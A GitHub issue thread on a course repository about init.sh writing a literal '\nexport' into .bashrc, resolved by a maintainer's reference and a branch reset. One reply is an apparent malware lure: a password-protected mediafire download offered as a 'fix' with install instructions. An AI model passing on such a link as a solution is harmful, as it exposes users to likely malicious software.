### ISSUE TITLE
 Environment variable bug

### ISSUE THREAD

**Issue by MichaelCao0** [NJU-ProjectN/ics2017#30]
When entering ~/.bashrc, there is a bug.(pa0)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by sashimi-yzh** [comment]
> When entering ~/.bashrc, there is a bug.(pa0)

I need more information.

**Comment by NeverHaving** [comment]
When i first clone this code and excute init.sh, this will add \nexport to .bashrc, so when excute source .bashrc, it will make error like this : command 'nexport' not found, i  think he/she was the same bug

**Comment by sashimi-yzh** [comment]
> When i first clone this code and excute init.sh, this will add \nexport to .bashrc, so when excute source .bashrc, it will make error like this : command 'nexport' not found, i think he/she was the same bug

If it is the case, please refer to #31 .

**Comment by NeverHaving** [comment]
get it，thanks

**Comment by NeverHaving** [comment]
By the way,it should be merge into branch 2023?

**Comment by sashimi-yzh** [comment]
> By the way,it should be merge into branch 2023?

Thank you for pointing out this. I have reset the branch 2023 to the commit before the buggy one.
